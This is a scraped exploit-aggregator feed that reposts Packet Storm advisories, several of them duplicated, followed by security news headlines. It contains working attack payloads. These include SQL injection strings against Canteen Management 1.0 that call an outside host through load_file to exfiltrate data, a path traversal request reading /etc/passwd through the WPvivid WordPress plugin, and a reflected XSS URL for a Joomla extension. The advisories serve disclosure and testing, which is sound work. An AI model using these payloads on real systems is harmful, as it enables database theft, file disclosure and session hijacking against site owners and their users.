Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Canteen Management 1.0-2022 SQL Injection
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Canteen Management version 1.0-2022 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
## Title: Canteen-Management1.0-2022 SQLi
## Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: https://www.mayurik.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi
## Description:
The username parameter from Canteen-Management1.0-2022 appears to be
vulnerable to SQL injection attacks.
The malicious user can attack remotely this system by using this
vulnerability to steal all information from the database of this
system.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND
'awEr'='awEr&password=h5F!l8j!Y6&login=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)
## Proof and Exploit:
[href](https://streamable.com/vvz2lh)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Canteen Management 1.0-2022 SQL Injection
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Canteen Management version 1.0-2022 suffers from a remote SQL injection vulnerability.
SHA-256 |
2d4328d6484fdeed0350fcb19dc9fe4f3d5499e3bb9f44d105865efdc3315733Download
## Title: Canteen-Management1.0-2022 SQLi
## Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: https://www.mayurik.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi
## Description:
The username parameter from Canteen-Management1.0-2022 appears to be
vulnerable to SQL injection attacks.
The malicious user can attack remotely this system by using this
vulnerability to steal all information from the database of this
system.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND
'awEr'='awEr&password=h5F!l8j!Y6&login=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)
## Proof and Exploit:
[href](https://streamable.com/vvz2lh)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Canteen Management 1.0-2022 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress WPvivid Backup Path Traversal
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
WordPress WPvivid Backup plugin versions prior to 0.9.76 suffer from a path traversal vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
WordPress WPvivid Backup Path Traversal
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
WordPress WPvivid Backup plugin versions prior to 0.9.76 suffer from a path traversal vulnerability.
SHA-256 |
fb090fe06b8107185b5b73bdfac52e984a5bd3987e4e8a14397734095d06addfDownload
=====[ Tempest Security Intelligence - ADV-15/2022
]==========================
Wordpress plugin - WPvivid Backup - Version < 0.9.76
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgements
* References
=====[ Vulnerability
Information]=============================================
* Class: Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')
('Path Traversal') [CWE-22]
* CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
* CVSS Base Score 7.2
=====[ Overview]========================================================
* System affected : Wordpress plugin - WPvivid Backup
* Software Version : Version < 0.9.76
* Impacts : The plugin WPvivid Backup does not sanitise and validate a
parameter before using it to read the content of a file, allowing high
privilege users to read any file from the web server via a Traversal attack.
=====[ Detailed
description]=================================================
* Steps to reproduce
1 - Authenticated as privilege user, copy the request below, change the
placeholder {{nonce}} with a valid nonce:
```
https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922
```
=====[ Timeline of
disclosure]===============================================
11/Aug/2022 - Responsible disclosure was initiated with the vendor.
15/Aug/2022 - WPvivid Support confirmed the issue.
16/Aug/2022 - WPvivid Support fix the issue.
08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.
=====[ Thanks & Acknowledgements]========================================
* Tempest Security Intelligence [5]
=====[ References ]=====================================================
[1][ [
https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html
]]
[2][ [
https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a
[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]
[4][ [
https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]
]
[5][ [Thanks FXO,ACPM,MFPP]]
=====[ EOF ]===========================================================
--
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress WPvivid Backup Path Traversal
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
WordPress Elementor 3.6.2 Shell Upload
___________________________
@hacking_Attack
@Hacking_Video
WordPress Elementor 3.6.2 Shell Upload
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
WordPress Elementor 3.6.2 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Joomla RAXO All-Mode PRO 2.01 Cross Site Scripting
https://2.bp.blogspot.com/-4wIBcK0z7y4/WWlvHXARtRI/AAAAAAAAILc/wzdKaT4lYrUxiztYZaNra08YExR9F67-wCLcBGAs/s1600/h14.png Joomla RAXO All-Mode PRO extension version 2.01 suffers from a cross site scripting vulnerability.
SHA-256 |
___________________________
@hacking_Attack
@Hacking_Video
Joomla RAXO All-Mode PRO 2.01 Cross Site Scripting
https://2.bp.blogspot.com/-4wIBcK0z7y4/WWlvHXARtRI/AAAAAAAAILc/wzdKaT4lYrUxiztYZaNra08YExR9F67-wCLcBGAs/s1600/h14.png Joomla RAXO All-Mode PRO extension version 2.01 suffers from a cross site scripting vulnerability.
SHA-256 |
b184da1d06132aed982ee2549a07da0dfa94c6d57c4ca741a10f65c4a73eec7aDownload ┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : extensions.joomla.org │
│ Vendor : RAXO Group - raxo.org │
│ Software : Joomla RAXO All-mode PRO 2.01 │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim's │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /search-results
GET parameter 'search' is vulnerable to XSS
https://www.target.com/search-results?search=hep3l%22onfocus%3d%22alert(1)%22autofocus%3d%22oakzt
[-] Done Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Joomla RAXO All-Mode PRO 2.01 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Dark Reading: Attacks/Breaches
More Than 30% of All Malicious Attacks Target Shadow APIs
New research spotlights how attackers are capitalizing on API-driven innovation.
___________________________
@hacking_Attack
@Hacking_Video
More Than 30% of All Malicious Attacks Target Shadow APIs
New research spotlights how attackers are capitalizing on API-driven innovation.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
More Than 30% of All Malicious Attacks Target Shadow APIs
New research spotlights how attackers are capitalizing on API-driven innovation.
Dark Reading: Attacks/Breaches
Eclypsium Raises Series B to Protect Digital Supply Chain As Attacks Grow
The new round highlights market demand to protect global businesses from soaring breaches through supply chains of critical hardware, devices, firmware, and software.
___________________________
@hacking_Attack
@Hacking_Video
Eclypsium Raises Series B to Protect Digital Supply Chain As Attacks Grow
The new round highlights market demand to protect global businesses from soaring breaches through supply chains of critical hardware, devices, firmware, and software.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Eclypsium Raises Series B to Protect Digital Supply Chain As Attacks Grow
The new round highlights market demand to protect global businesses from soaring breaches through supply chains of critical hardware, devices, firmware, and software.
Dark Reading: Attacks/Breaches
Aryaka Delivers Zero-Trust WAN Based on Unified SASE Architecture
The new offering integrates firewall-as-a-service and secure web gateway into cloud-managed networking and security services.
___________________________
@hacking_Attack
@Hacking_Video
Aryaka Delivers Zero-Trust WAN Based on Unified SASE Architecture
The new offering integrates firewall-as-a-service and secure web gateway into cloud-managed networking and security services.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Aryaka Delivers Zero-Trust WAN Based on Unified SASE Architecture
The new offering integrates firewall-as-a-service and secure web gateway into cloud-managed networking and security services.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Slack Security: Break it or Make it!
https://cdn-images-1.medium.com/max/600/1*mYyZhRuIfFPTSZwwDgLLzQ.png
Slack the “Email slayer ‘’ and de facto ‘coffee machine’ for most of the start ups, lets you create different chat groups/rooms that are…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Slack Security: Break it or Make it!
https://cdn-images-1.medium.com/max/600/1*mYyZhRuIfFPTSZwwDgLLzQ.png
Slack the “Email slayer ‘’ and de facto ‘coffee machine’ for most of the start ups, lets you create different chat groups/rooms that are…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Slack Security: Break it or Make it!
Slack the “Email slayer ‘’ is de facto “communication tool” for most of the start ups. It lets you create different chat groups/rooms that…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Microsoft SQL Injection
https://cdn-images-1.medium.com/max/1200/0*E692H7g83Az32Sxu.jpg
Introduction
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Microsoft SQL Injection
https://cdn-images-1.medium.com/max/1200/0*E692H7g83Az32Sxu.jpg
Introduction
Continue reading on System Weakness »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Microsoft SQL Injection
Introduction